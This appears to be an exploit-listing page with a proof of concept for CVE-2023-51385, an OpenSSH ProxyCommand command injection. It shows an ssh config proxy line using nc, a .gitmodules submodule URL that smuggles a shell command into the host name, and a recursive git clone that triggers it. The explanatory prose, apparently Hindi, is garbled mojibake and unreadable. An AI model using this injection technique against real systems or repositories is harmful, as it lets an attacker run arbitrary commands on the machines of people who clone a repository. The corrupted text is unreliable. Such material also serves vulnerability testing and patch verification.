## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LSP1025923-CVE-2023-51385
## CVE-2023-51385 рдХреА рдкреБрд╖реНрдЯрд┐
рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, `~/.ssh/config` рдореЗрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕рд╛рдордЧреНрд░реА рдЬреЛрдбрд╝реЗрдВ
root@kitploit:~
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
`.gitmodules` рдлрд╝рд╛рдЗрд▓ рдХреЗ рд╕реНрдЯреЗрдЯрдореЗрдВрдЯ рдореЗрдВ рдХрдорд╛рдВрдб рдЗрдВрдЬреЗрдХреНрд╢рди рд╣реИ
root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдкреВрд░рд╛ рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж, рдЯреНрд░рд┐рдЧрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдиреАрдЪреЗ рджрд┐рдП рдЧрдП рдирд┐рд░реНрджреЗрд╢ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
рдпрджрд┐ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрддрд╛ рд╣реИ, рддреЛ CVE-2023-51385_test рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХреЗ рдЕрдВрддрд░реНрдЧрдд cve.txt рдлрд╝рд╛рдЗрд▓ рдЙрддреНрдкрдиреНрди рд╣реЛрдЧреА

рдиреЛрдЯ: OpenSSH рдХреЛ <9.6p1 рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ
рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдЗрд╕ рдмреНрд▓реЙрдЧ рдореЗрдВ рджреЗрдЦреЗрдВ:
https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html